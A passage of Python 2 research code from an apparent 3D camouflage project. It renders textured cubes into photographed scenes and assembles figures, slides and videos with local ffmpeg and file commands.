xrange(as_juv0.shape[0]):\n as_juv1[j] = ig.resize(as_juv0[j], as_juv1[j].shape[:2], order = 0, hires = False)\n results1 = np.array(mesh.index_as_flat(as_juv1), 'l')\n\n texel_colors = camo.from_color_space_2d(label_color[range(len(results1)), results1])\n #texel_colors = label_color[range(len(results1)), results1]\n\n ut.toplevel_locals()\n elif 0:\n texel_colors = ut.load('../results/real-interior.pk')[0]\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = 512)\n else:\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0]\n \n texel_colors = camo.to_color_space_2d(texel_colors)\n texel_colors = mesh.index_as_juv(texel_colors)\n out_path = '../results/real/colors.mat'\n scipy.io.savemat(out_path, {'texel_colors' : texel_colors})\n import matlab\n matlab.matlab_cmd('/data/vision/billf/camo/camo', 'load_real_cube')\n\ndef make_printable_pattern(scene_path, mesh0, texel_colors0, results0, labels0, geom = None):\n #texel_colors = camo.to_color_space_2d(ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0])\n # upgrade to larger texel size; bigger images\n #texsize = 1024\n texsize = 4096\n #scan = dset.Scan(scene_path, max_dim = 2000)\n scan = dset.Scan(scene_path, max_dim = None)\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = texsize)\n \n\n as_juv0 = mesh0.index_as_juv(results0).copy()\n as_juv1 = mesh.index_as_juv(np.zeros(mesh.ntexels)).copy()\n\n for j in xrange(as_juv0.shape[0]):\n as_juv1[j] = ig.resize(as_juv0[j], as_juv1[j].shape[:2], order = 0, hires = False)\n \n results1 = np.array(mesh.index_as_flat(as_juv1), 'l')\n\n labels = np.array(labels0, 'double')\n labels[:, 1:] *= scan.scale/dset.Scan(scene_path).scale\n\n print labels\n\n texel_colors = np.zeros((mesh.ntexels, 3))\n\n if geom is None:\n geom = camo.Geom(scan, mesh)\n \n print len(np.unique(results1))\n for label in np.unique(results1):\n print 'trying', label\n label = int(label)\n frame = int(labels[label, 0])\n valid, colors = camo.project_texels(scan, frame, mesh, scan.im(frame), geom, 
labels[label, 1:])\n ok = results1 == label\n texel_colors[ok] = colors[ok]\n \n #texel_colors = label_color[range(len(results1)), results1]\n\n texel_colors_rgb = texel_colors.copy()\n \n ut.toplevel_locals()\n\n #texel_colors = camo.to_color_space_2d(texel_colors)\n texel_colors = mesh.index_as_juv(texel_colors)\n out_path = '../results/real/colors.mat'\n scipy.io.savemat(out_path, {'texel_colors' : texel_colors, 'texel_colors_rgb' : texel_colors_rgb})\n\n\n # import matlab\n # matlab.matlab_cmd('/data/vision/billf/camo/camo', 'load_real_cube')\n\n\ndef make_rescomp_fig(n = None):\n table = []\n # index frames to be consistent w/ amt results\n\n comparisons = [\n ('mit-20', 3, ['occlusion-wide', 'interior-wide']),\n ('disrupt-14', 4, ['occlusion-wide', 'random']),\n ('disrupt-14', 5, ['occlusion-wide', 'random']),\n ('disrupt-14', 3, ['occlusion-wide', 'random']),\n ]\n\n #scene_acc = ut.load(STATS_PATH)\n\n #out_dir = '../results/qual-compare'\n out_dir = '../results/qual-compare2'\n ut.mkdir(out_dir)\n num = 0\n for scene, loo_idx, methods in comparisons:\n scan = scan_fullres(False, path_from_scene(scene))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n table.append([])\n\n for method in methods:\n data = ut.load(ut.pjoin(make_path('loo', method, scene), 'data_%03d.pk' % loo_idx))\n texel_colors = data['ret'][0]\n loo_frame = scan.idx.index(data['pr'].loo_frame_idx)\n\n im = render_cube(scan.path, mesh, texel_colors, loo_frame, 200, outline = True, frame_using_cube = True)\n assert im.shape[0] == im.shape[1]\n table[-1] += [method, im]\n #table[-1] += [method, render_cube(scan.path, mesh, texel_colors, loo_frame, 200, outline = False)]\n ig.save(ut.pjoin(out_dir, 'result-%03d.pdf' % num), im)\n ig.save(ut.pjoin(out_dir, 'result-%03d.png' % num), im)\n num += 1\n ig.show(table)\n\ndef count_ims():\n total = 0\n for scene in ALL_SCENES:\n path = make_path('loo', 'interior-wide', scene)\n nims = len(glob.glob(path + '/result_*.jpg'))\n total += nims\n print scene, nims\n print 'total images', total, 'scenes', len(ALL_SCENES)\n \n\ndef draw_grid(im, proj, spacing = [-1, 0, 1]):\n d = 30.\n for x in spacing:\n for y in spacing:\n if x < 1:\n im = ig.draw_lines(im, [proj + d*np.array([x, y])], [proj + d*np.array([x+1, y])], colors = (255, 255, 255))\n if y < 1:\n im = ig.draw_lines(im, [proj + d*np.array([x, y])], [proj + d*np.array([x, y+1])], colors = (255, 255, 255))\n return im\n \ndef make_project_fig():\n #scene = 'mit-35'\n scene = 'mit-37'\n path = make_path('noloo', 'interior-wide', scene)\n #texel_colors = ut.load(ut.pjoin(path, 'data.pk'))['ret'][0]\n \n scan = dset.Scan(path_from_scene(scene))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n scan = dset.Scan(path_from_scene(scene))\n frames = range(scan.length)#[scan.length-1] #range(scan.length)[:1]\n\n geom = camo.Geom(scan, mesh)\n\n #texel = mesh.juv2tex[5, 128, 128]\n texel = mesh.juv2tex[2, 128, 128]\n \n table = []\n for frame in frames:\n proj = scan.project(frame, mesh.texel_pts[texel])\n im_grid = draw_grid(scan.im(frame), proj)\n label_valid, self_colors = camo.project_texels(scan, frame, mesh, im_grid, geom)\n im = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = False, outline = True, frame_using_cube = True, occ_thresh = 2., draw_boundaries = True, im = im_grid, use_fr = False)\n table.append([im, scan.im(frame)])\n #table.append(ig.draw_pts(im, proj))\n\n ig.show(table)\n \n\ndef find_best_algs():\n with ut.constant_seed():\n scene_acc = ut.load(STATS_PATH)\n for scene in 
ALL_SCENES:\n algs = ['greedy', 'interior-wide', 'occlusion-wide']\n acc = [np.mean(scene_acc[scene, idx_from_alg(alg)]) for alg in algs]\n i = np.argmin(acc)\n #print scene, algs[i], acc\n yield scene, algs[i]\n\ndef label_plane(seq, root = 0, y_flip = True):\n scan = dset.Scan(seq, None)\n _, _, tracks = dset.read_bundler(scan.bundle_file, scan.full_shape)\n pts = np.array([t[0] for t in tracks])\n \n proj = scan.project(root, pts)\n\n pylab.clf()\n im_with_pts = ig.draw_pts(scan.im(root), proj, width = 2)\n pylab.imshow(im_with_pts)\n rect = ut.bbox2d(pylab.ginput(2, timeout = -1))\n #rect = (1782.005828476269, 1431.7364696086595, 529.75936719400488, 354.40549542048279)\n print rect\n\n ok = ut.land(rect[0] <= proj[:, 0], proj[:, 0] <= rect[0] + rect[2], rect[1] <= proj[:, 1], proj[:, 1] <= rect[1] + rect[3])\n pts_in_box = pts[ok]\n thresh = pylab.dist(scan.center(root), scan.center(root+1))/50.\n plane, _ = planefit.fit_plane_ransac(pts_in_box, thresh)\n if plane[1] < 0 and y_flip:\n plane *= -1\n\n ins = planefit.plane_inliers(plane, pts, thresh)\n\n pylab.clf()\n colors = np.zeros_like(pts)\n colors[:, 0] = 255\n colors[ins] = (0, 255, 0)\n\n im_ins = ig.draw_pts(scan.im(root), map(ut.itup, proj), map(ut.itup, colors), width = 2)\n pylab.clf()\n pylab.imshow(im_ins)\n \n print plane\n return plane\n\nvideo_order = ['charlottesville-3', 'bookshelf-real', 'disrupt-11', 'mit-14', 'walden-brush2', 'walden-log', \\\n 'disrupt-8', 'charlottesville-1', 'mit-13', 'disrupt-6']\n \ndef test_warp(par = 0, start = 0, end = None):\n #scenes = ['bookshelf-real']#['couch3-real', 'bookshelf-real', 'disrupt-11', 'patio2-real', 'mit-1', 'disrupt-8', 'charlottesville-2']\n # 5: side\n # 4: usually side\n # 3: usually side\n # 2: usually side\n # 1: usually top\n # 0: usually bottom\n # np.array([-0.9286861 , 0.13738529, -0.34448136, -3.96361632])\n scenes = [('disrupt-11', 0, 1, [], []),\n ('charlottesville-2', 0, 1, [], [(8, 9)]),\n ('mit-27', 0, 1, [np.array([ -9.06738777e-01, 2.58900135e-03, 4.21684821e-01, 2.93683015e+00])], []),\n ('disrupt-6', 0, 1, [np.array([ 0.85136312, 0.18874681, -0.48944405, -1.52800028])], []),\n ('couch3-real', 0, 1, [np.array([-0.60995728, 0.15168697, -0.77778094, -0.88194374])], []),\n ('couch5-real', 2, 1, [], []),\n ('disrupt-8', 0, 1, [np.array([-0.92784247, 0.1387372 , -0.34620851, -3.97233358])], []),\n ('mit-13', 0, -1, [], []),\n ('mit-20', 0, -1, [], []),\n ('bookshelf-real', 3, -1, [], [])]\n# ('disrupt-6', 0, 1, [], [np.array([ 0.85139516, 0.190946 , -0.48853444, -1.52601666])]),\n for x in ALL_SCENES:\n if x not in map(ut.fst, scenes):\n scenes.append((x, 0, 1, [], []))\n #print scenes\n\n #scenes = scenes[start:end]\n scenes = sorted(scenes, key = lambda x : (len(video_order) if x[0] not in video_order else video_order.index(x[0]), x[0]))\n scenes = scenes[start:end]\n ip.reset(par)\n\n scene_alg = dict(find_best_algs())\n\n #scene_names = [y[0] for y in scenes]\n for scene, plane_idx, order, other_planes, bad_pairs in scenes:\n #texel_colors = ut.load(ut.pjoin(make_path('noloo', 'interior-wide', scene), 'data.pk'))['ret'][0]\n alg = 'random' #scene_alg[scene]\n texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0]\n scan = dset.Scan(ut.pjoin('../data/', scene))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n #tour.tour(scan, mesh, texel_colors, [0, 1, 2, 3], par = par)\n if 0:\n if order == 1:\n frames = range(scan.length)\n else:\n frames = list(reversed(range(scan.length)))\n else:\n frames = 
sorted(set(map(int, np.linspace(0, scan.length-1, 6))))\n if order != 1:\n frames = list(reversed(frames))\n \n #print 'before mem usage'\n #ut.mem_usage()\n print scene, alg\n # url = tour.tour(scan, mesh, texel_colors, frames, plane_idx = plane_idx,\n # other_planes = other_planes, bad_pairs = bad_pairs,\n # outline_start = 0, outline_end = 1, start_wo_outline = True, par = par)\n \n #url = tour.tour(scan, mesh, texel_colors, frames, plane_idx = plane_idx, other_planes = other_planes, bad_pairs = bad_pairs, outline_start = scan.length/2, par = par)\n url = tour.tour(scan, mesh, texel_colors, frames, plane_idx = plane_idx, other_planes = other_planes, bad_pairs = bad_pairs, par = par)\n f = open('../results/vid-list', 'a')\n print >>f, scene, alg, url\n f.close()\n #print other_planes\n #url = tour.tour(scan, mesh, texel_colors, [scan.length-2, scan.length-1], n = 5, plane_idx = plane_idx, other_planes = other_planes, par = par)\n #print 'after mem usage'\n #ut.mem_usage()\n\ndef make_warps():\n for i in xrange(len(ALL_SCENES)):\n os.system('python -c \"import figures; figures.test_warp(par = 1, start = %d, end = %d+1)\"' % (i, i))\n\ndef collect_warps():\n urls = [x.split() for x in ut.lines('../results/vid-results')]\n base = '/data/vision/billf/aho-billf/www/tab'\n out = ut.make_temp_dir(dir = base)\n f = open(ut.pjoin(out, 'index.html'), 'w')\n for _, _, url in urls:\n last = url.split('/')[-1]\n path = os.path.join(base, last)\n page_in = open(ut.pjoin(path, 'index.html'), 'r')\n f.write(page_in.read() + '\\n')\n for y in glob.glob(path + '/*.mp4'):\n os.system('ln -s %s %s/' % (y, out))\n f.close()\n os.system('chmod -R a+rwx %s' % out)\n print ut.pjoin(imtable.PUBLIC_URL, out.split('/')[-1])\n\nclass MeshOcc:\n def __init__(self, scan, mask_path = None):\n self.scan = scan\n self.path = mask_path\n\n def mask(self, frame):\n if self.path is None:\n return np.zeros(self.scan.im(frame).shape[:2])\n else:\n fname = os.path.join(self.path, 'masked%d.png'% (frame+1))\n if os.path.exists(fname):\n mask = np.all(ig.load(fname) == (255, 0, 255), axis = 2)\n mask = 255*np.array(mask, 'd')\n mask = ig.resize(mask, self.scan.scale, hires = 1)/255.\n return mask\n else:\n return np.zeros(self.scan.im(frame).shape[:2])\n\n def apply_mask(self, im_mesh, im_nomesh, mask):\n return im_mesh*(1.-mask[:,:,np.newaxis]) + im_nomesh*mask[:,:,np.newaxis]\n \ndef make_videos():\n # order = ['charlottesville-3', 'bookshelf-real', 'disrupt-11', 'mit-14', 'walden-brush2', 'mit-27', 'mit-1', 'walden-log', \\\n # 'mit-5', 'charlottesville-1', 'couch3-real', 'disrupt-6', 'disrupt-8', 'mit-13']\n print 'tmp'\n video_order = ['charlottesville-3', 'bookshelf-real', 'disrupt-11', 'mit-14', 'walden-log', \\\n 'disrupt-8', 'charlottesville-1', 'mit-13', 'disrupt-6']\n vids = []\n #urls = dict([(x.split()[0], x.split()[1:]) for x in ut.lines('../results/vid-results')])\n urls = dict([(x.split()[0], x.split()[1:]) for x in ut.lines('../results/vid-list')])\n base = '/data/vision/billf/aho-billf/www/tab'\n for scene in video_order:\n alg, url = urls[scene]\n print 'alg', alg\n last = url.split('/')[-1]\n path = os.path.join(base, last)\n vids.append(glob.glob(path + '/*.mp4')[0])\n\n print '\\n'.join(vids)\n ut.write_lines('../results/ffmpeg-vid-list', ['file %s' % s for s in vids])\n os.system('ffmpeg -f concat -i ../results/ffmpeg-vid-list -c copy /data/vision/billf/aho-billf/www/camo-vid.mp4')\n\n\n \ndef make_nondetect_slide(todo, par = False):\n ip.reset(par)\n scene = 'bookshelf-real'\n #scan = 
dset.Scan(ut.pjoin('../data/', scene))\n #scan = dset.Scan(ut.pjoin('../data/', scene), max_dim = 500.)\n scan = dset.Scan(ut.pjoin('../data/', scene))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n\n frame = 6\n \n # fix the mesh\n lf = frame-1\n\n if 'move' in todo:\n # front\n plane1 = mesh.face_planes[5]\n # side\n plane2 = mesh.face_planes[4]\n pt1 = mesh.mesh_pts[mesh.face_idx[lf][0]]\n pt2 = mesh.mesh_pts[mesh.face_idx[lf][1]]\n\n table = []\n # for d in np.linspace(0.8, 0.9, 5):\n # for d2 in np.linspace(0.05, 0.5, 5):\n\n for d in [0.85]:\n for d2 in [1-0.85]:\n #for d3 in [0.1, 0.11, 0.12, 0.15]:\n for d3 in [0.15]:\n for d4 in [0, 0.025, 0.05, 0.1]:\n\n if 1:\n bottom = 1\n top = 0\n\n mesh_pts = mesh.mesh_pts.copy()\n\n for i in xrange(scan.length):\n if i in (top, bottom):\n pts = mesh.mesh_pts[mesh.face_idx[i]].copy()\n c = np.mean(pts, axis = 0)\n mesh_pts[mesh.face_idx[i]] = c + d*(pts - c)\n\n if i == top:\n mesh_pts[mesh.face_idx[i]] -= d2*pylab.dist(pt1, pt2)*mesh.face_planes[i][:3]\n\n #mesh2 = box.Mesh(mesh.face_idx, mesh_pts)\n\n #mesh2 = box.Mesh(mesh.face_idx, mesh_pts - plane[:3]*0.07*pylab.dist(pt1, pt2))\n mesh2 = box.Mesh(mesh.face_idx, mesh_pts - plane1[:3]*d3*pylab.dist(pt1, pt2))\n mesh2 = box.Mesh(mesh.face_idx, mesh_pts - plane2[:3]*d4*pylab.dist(pt1, pt2))\n table.append([d, d2, d3, d4] + [box.draw_faces(mesh2, scan, i) for i in scan.frames])\n ig.show(table)\n \n #frame = 3\n\n\n\n #lf = 1\n lf = frame-1\n d = np.linalg.norm(scan.center(lf) - scan.center(lf-1))\n pt = scan.center(lf) + 1.05*d*np.array([0., 1., 0]) #0.1*mesh.face_planes[-1][:3]*d\n im = scan.im(lf)\n\n #VDIR = mvg.ray_dirs(scan.K(lf), im.shape, scan.R(lf))[im.shape[0]/2, im.shape[1]/2]\n\n texel_colors = np.zeros((mesh.ntexels, 3))\n for face in xrange(6):\n print np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt), ut.normalized(mesh.face_planes[face][:3])))\n texel_colors[mesh.tex2juv[:, 0] == face] = 255*np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt),\n ut.normalized(mesh.face_planes[face][:3])))\n\n #texel_colors *= 225/float(np.max(texel_colors))\n texel_colors *= 255/float(np.max(texel_colors))\n\n lighting_colors = texel_colors.copy()\n ut.save('../results/bookshelf-lighting.pk', lighting_colors)\n\n mesh_occ = MeshOcc(scan, '../results/bookshelf-masks')\n\n def mesh_render(*args, **kwargs):\n kwargs['mask'] = mesh_occ.mask(args[1])\n return mesh.render(*args, **kwargs)\n \n if 'lighting' in todo:\n ig.show([[mesh_render(scan, f, texel_colors), scan.im_with_real(f)] for f in range(scan.length)])\n\n geom = camo.Geom(scan, mesh)\n \n if 'random' in todo:\n #for other_frame in xrange(scan.length):\n table = []\n for frame1 in scan.frames:\n _, texel_colors = camo.project_texels(scan, frame1, mesh, scan.im(frame1), geom)\n table.append([])\n for frame2 in scan.frames:\n table[-1] += [frame1, frame2, mesh_render(scan, frame2, texel_colors)]\n ig.show(table)\n\n if 'tour-random' in todo:\n #frames = [6, 0]\n #frames = [6, 2]\n frames = [6, 3]\n valid, proj_colors = camo.project_texels(scan, frames[0], mesh, scan.im(frames[0]), geom)\n texel_colors = lighting_colors.copy()\n texel_colors[valid] = proj_colors[valid]\n\n tour.tour(scan, mesh, texel_colors, frames, plane_idx = 3, par = par)\n\n if 'distortion-real' in todo:\n src_frame = 2\n view_frame = 1\n face = 2\n scan_tour = dset.Scan(ut.pjoin('../data/', scene))\n colors = lighting_colors.copy()\n colors[:] = 200\n colors[mesh.tex2juv[:, :, 0] == face] = (0, 128, 0)\n\n table = []\n valid, proj_colors = 
camo.project_texels(scan_tour, src_frame, mesh, scan_tour.im(src_frame), geom)\n colors[valid] = proj_colors\n table.append(mesh_render(scan_tour, view_frame, colors))\n \n ig.show(table)\n\n\n if 'distortion-synthetic' in todo:\n proj_frame = 2\n view_frame = 1\n \n im = scan.im(proj_frame).copy()\n mask = box.mask(scan, mesh, proj_frame)\n\n #pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/zebra-stripes-vector/zebra-stripes.png')\n #pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/checkers/Checkerboard_pattern.png')\n pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/checkers/Checkerboard_pattern.jpg')\n #pattern = pattern.transpose([1, 0, 2])\n\n ys, xs = np.nonzero(mask)\n rect = ut.bbox2d(zip(xs, ys))\n\n s = 1.02*max(float(rect[3]) / pattern.shape[0], float(rect[2]) / pattern.shape[1])\n\n pattern = ig.resize(pattern, s)\n\n cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1))\n ig.sub_img(im, ut.rect_centered_at(cx, cy, pattern.shape[1], pattern.shape[0]))[:] = pattern\n\n _, texel_colors = camo.project_texels(scan, proj_frame, mesh, im, geom)\n texel_colors = texel_colors * np.array(lighting_colors, 'd')/255. \n\n table = []\n # table.append(mesh_render(scan, view_frame, texel_colors, im = 255+np.zeros_like(im)))\n # table.append(mesh_render(scan, proj_frame, texel_colors, im = 255+np.zeros_like(im)))\n table.append(mesh_render(scan, view_frame, texel_colors))\n table.append(mesh_render(scan, proj_frame, texel_colors))\n ig.show(table)\n \n if 'tour-cues' in todo:\n #ntour = 5\n ntour = 40\n do_tours = False\n \n #scan_tour = dset.Scan(ut.pjoin('../data/', scene), max_dim = 500.)\n scan_tour = dset.Scan(ut.pjoin('../data/', scene))\n frames = [6, 2]\n valid, proj_colors = camo.project_texels(scan_tour, frames[0], mesh, scan_tour.im(frames[0]), geom)\n texel_colors = 0.75*lighting_colors.copy()\n texel_colors[valid] = proj_colors[valid]\n\n print 'distortion and occlusion boundary cues'\n if do_tours: tour.tour(scan_tour, mesh, texel_colors, frames, plane_idx = 3, im_wait = 1, n = ntour,\n mesh_occ = mesh_occ, outline_start = 0, outline_end = 1, par = par)\n\n table = []\n # all\n table.append(mesh_render(scan_tour, frames[-1], texel_colors))\n\n sc = 0.4\n im_dark = sc*scan_tour.im(frames[-1])\n table.append(sc*mesh_render(scan_tour, frames[-1], texel_colors))\n ig.show(table)\n table.append(mesh_render(scan_tour, frames[-1], texel_colors, im = im_dark))\n\n # distortion and occlusion\n #for f in [0, 6]:#xrange(6):\n for f in xrange(6):#xrange(6):\n tc = texel_colors.copy()\n tc[mesh.tex2juv[:, 0] != f] *= sc\n table.append([f, mesh_render(scan_tour, frames[-1], tc, im = im_dark)])\n ig.show(table)\n \n print \"what happens if we look at a view that wasn't covered?\"\n frames2 = [2, 0]\n ig.show(mesh_render(scan_tour, frames[-1], tc, im = im_dark))\n if do_tours: tour.tour(scan_tour, mesh, texel_colors, frames2, n = ntour, plane_idx = 3, im_wait = 1, par = par, mesh_occ = mesh_occ)\n\n print 'we can fill it with something...'\n other_frame = 1\n valid2, proj_colors2 = camo.project_texels(scan_tour, other_frame, mesh, scan_tour.im(other_frame), geom)\n\n texel_colors_filled = texel_colors.copy()\n texel_colors_filled[(-valid) & valid2] = proj_colors2[-valid & valid2]\n \n im_dark = sc*scan_tour.im(frames2[-1])\n ig.show([mesh_render(scan_tour, frames2[-1], texel_colors_filled),\n mesh_render(scan_tour, frames2[-1], texel_colors_filled, im = im_dark)])\n \n ig.show([mesh_render(scan_tour, f, 
texel_colors_filled) for f in scan.frames])\n \n \n #if do_tours: tour.tour(scan_tour, mesh, texel_colors, frames, plane_idx = 3, im_wait = 1, par = par)\n\n\n if 'test-mask' in todo:\n table = []\n #scan = scan_fr = scan_fullres(True, scan.path)\n for frame in scan.frames:\n fname = '../results/bookshelf-masks/im%d-colored.png' % (frame+1)\n if os.path.exists(fname):\n mask = np.all(ig.load(fname) == (255, 0, 255), axis = 2)\n mask = 255*np.array(mask, 'd')\n mask = ig.resize(mask, scan.scale, hires = 1)/255.\n #mask = np.array(ig.resize(np.array(mask, 'd'), scan.scale, order = 1, hires = 0))\n #ig.show(mask)\n im = box.draw_faces(mesh, scan, frame)\n if 0:\n im[mask] = scan.im(frame)[mask]\n if 1:\n im = im*(1.-mask[:,:,np.newaxis]) + mask[:,:,np.newaxis]*scan.im(frame)\n table.append(im)\n\n ig.show(table)\n \n if 'mask' in todo:\n scan_fr = scan_fullres(True, scan.path)\n ig.show([[scan_fr.im(f), box.draw_faces(mesh, scan_fr, f)] for f in scan_fr.frames])\n \n \n if 'zebra' in todo:\n table = []\n # for frame1 in scan.frames:\n # for other_frame in scan.frames: #[scan.length-1]:\n for frame1 in [6]:\n for other_frame in [4]: #[scan.length-1]:\n im = scan.im(other_frame).copy()\n mask = box.mask(scan, mesh, other_frame)\n\n pattern = ig.load('/data/vision/billf/camo/camo/nondetect/results/textures/zebra-stripes-vector/zebra-stripes.png')\n pattern = pattern.transpose([1, 0, 2])\n\n ys, xs = np.nonzero(mask)\n #cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1))\n rect = ut.bbox2d(zip(xs, ys))\n\n s = 1.02*max(float(rect[3]) / pattern.shape[0], float(rect[2]) / pattern.shape[1])\n\n print s\n\n pattern = ig.resize(pattern, s)\n\n #ig.sub_img(im, rect)[:] = pattern\n cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1))\n ig.sub_img(im, ut.rect_centered_at(cx, cy, pattern.shape[1], pattern.shape[0]))[:] = pattern\n \n _, texel_colors = camo.project_texels(scan, other_frame, mesh, im, geom)\n\n texel_colors = texel_colors * np.array(lighting_colors, 'd')/255.\n\n table.append([frame1, other_frame, mesh_render(scan, frame1, texel_colors), mesh_render(scan, frame1, lighting_colors), scan.im_with_real(frame1)])\n\n ig.show(table)\n\ndef make_octopus_video():\n vids_in = ['../results/Ovulg_Wow_sequence_Silent_RTHWatermark.mov', '../results/Octopus Vulgaris.mov']\n #clips = ['../results/octo-clip1.mov', '../results/octo-clip2.mov']\n clips = ['../results/octo-clip1.mov', '../results/octo-clip2.mp4']\n times = ['-ss 00:00:00 -t 10', '-ss 00:05:48 -t 12.5']\n\n # for vid, clip, time in zip(vids_in, clips, times):\n # os.system('ffmpeg -i \"%s\" %s \"%s\"' % (vid, time, clip))\n \n ut.write_lines('../results/ffmpeg-octopus-list', ['file %s' % s for s in clips])\n os.system('ffmpeg -f concat -i ../results/ffmpeg-octopus-list -c copy ../results/octopus-talk.mp4')\n print 'scp', 'aho@vision11.csail.mit.edu:' + os.path.abspath('../results/octopus-talk.mp4'), '~/Dropbox/cvpr-talk/octopus-talk.mp4'\n \n\ndef spotlight_slides(par = 1):\n scene = 'charlottesville-3'\n alg = 'occlusion-wide'\n scan = dset.Scan(ut.pjoin('../data/', scene))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n #texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0] \n #lighting_colors = ut.load('../results/bookshelf-lighting.pk')\n\n frame = 0\n lf = 4\n d = np.linalg.norm(scan.center(lf) - scan.center(lf-1))\n pt = scan.center(lf) + 2.05*d*np.array([0., 1., 0]) #1.05*d*np.array([0., 1., 0]) #0.1*mesh.face_planes[-1][:3]*d\n im = scan.im(lf)\n\n #VDIR = mvg.ray_dirs(scan.K(lf), 
im.shape, scan.R(lf))[im.shape[0]/2, im.shape[1]/2]\n\n texel_colors = np.zeros((mesh.ntexels, 3))\n for face in xrange(6):\n print np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt), ut.normalized(mesh.face_planes[face][:3])))\n texel_colors[mesh.tex2juv[:, 0] == face] = 255*np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt),\n ut.normalized(mesh.face_planes[face][:3])))\n texel_colors *= 255/float(np.max(texel_colors))\n lighting_colors = texel_colors\n\n im = mesh.render(scan, frame, lighting_colors)\n #ig.show(ig.resize(im, 0.5))\n texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0]\n im_colored = mesh.render(scan, frame, texel_colors)\n ig.show([im, im_colored])\n \n plane_idx = 0\n url = tour.tour(scan, mesh, texel_colors, range(scan.length), plane_idx = plane_idx, par = par, start_scale = 0)\n ig.show(url)\n \n \ndef make_occ_examples(texel_colors=None):\n ut.seed_rng(0)\n\n scene = 'walden-brush2'\n if 0:\n #alg = 'greedy'\n #texel_colors = ut.load(ut.pjoin(make_path('noloo', alg, scene), 'data.pk'))['ret'][0]\n #render_cube(scan.path, mesh, texel_colors, frame, 200, outline = True, frame_using_cube = True)\n scan_fr = dset.Scan(ut.pjoin('../data', scene), max_dim = None)\n mesh = box.load_from_mat(ut.pjoin(scan_fr.path, 'cube.mat'), 512)\n if texel_colors is not None:\n try:\n texel_colors = camo.camo(scan_fr, mesh, ut.Struct(method = 'greedy'))[0]\n except:\n print 'exception'\n\n ut.toplevel_locals()\n\n if 1:\n scan = dset.Scan(ut.pjoin('../data', scene))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n table = []\n view_frame = 2\n for frame in scan.frames:\n try:\n texel_colors = camo.camo(scan, mesh, ut.Struct(method = 'order', order = [frame]))[0]\n table.append([frame, render_cube(scan.path, mesh, texel_colors, view_frame, 200, fullres = True, outline = False, frame_using_cube = True)])\n except:\n print 'exception'\n ig.show(table)\n return\n \n frame = 2\n im_bg = render_cube(scan_fr.path, mesh, texel_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True, show_cube = False)\n ig.show(im_bg)\n im_nooutline = render_cube(scan_fr.path, mesh, texel_colors, frame, 200, fullres = True, outline = False, frame_using_cube = True)\n im_outline = render_cube(scan_fr.path, mesh, texel_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True)\n ig.show([im_bg, im_nooutline, im_outline])\n\n\ndef make_occlusion_slide():\n #scan = dset.Scan('../data/disrupt-14')\n #scan = dset.Scan('../data/walden-tree1')\n scan = dset.Scan('../data/mit-13', max_dim = None)\n #mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), 1024)\n # table = []\n # for frame in scan.frames:\n # view_frame = frame\n # texel_colors = camo.camo(scan, mesh, ut.Struct(method = 'order', order = [frame]))[0]\n # table.append([frame, render_cube(scan.path, mesh, texel_colors, view_frame, 200, fullres = True, outline = True, frame_using_cube = True)])\n # ig.show(table)\n\n #texel = mesh.juv2tex[2, 128, 128]\n #texel = mesh.juv2tex[2, 0, 128]\n #texel = mesh.juv2tex[2, 0, 128]\n texel = mesh.juv2tex[5, 0, 128]\n geom = camo.Geom(scan, mesh)\n \n table = []\n for frame in [0, 2, 4, 6]:#scan.frames:#[0, 1, 4]:\n #table.append(scan.im(frame))\n proj = scan.project(frame, mesh.texel_pts[texel])\n if 1:\n im_grid = draw_grid(scan.im(frame), proj, spacing = [0])\n else:\n im_grid = scan.im(frame)\n label_valid, self_colors = camo.project_texels(scan, frame, mesh, 
im_grid, geom)\n #im = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = False, outline = True, frame_using_cube = True, occ_thresh = 2., draw_boundaries = True, im = im_grid, use_fr = False)\n im_nooutline = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = True, outline = False, frame_using_cube = True)\n im_outline = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True)\n #im = render_cube(scan.path, mesh, self_colors, frame, 200, fullres = True, outline = True, frame_using_cube = True, occ_thresh = 2., draw_boundaries = True, im = im_grid, use_fr = False)\n table.append([str(frame), im_outline, im_nooutline])\n \n #table.append([str(frame), im, scan.im(frame)])\n #table.append(ig.draw_pts(im, proj))\n\n ig.show(table)\n \ndef make_capture_slide():\n scene = 'mit-37'\n scan = dset.Scan(ut.pjoin('../data', scene))\n mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'))\n \n if 'lighting':\n lf = 13\n d = np.linalg.norm(scan.center(lf) - scan.center(lf-1))\n pt = scan.center(lf) + 2.05*d*np.array([0., 1., 0]) #1.05*d*np.array([0., 1., 0]) 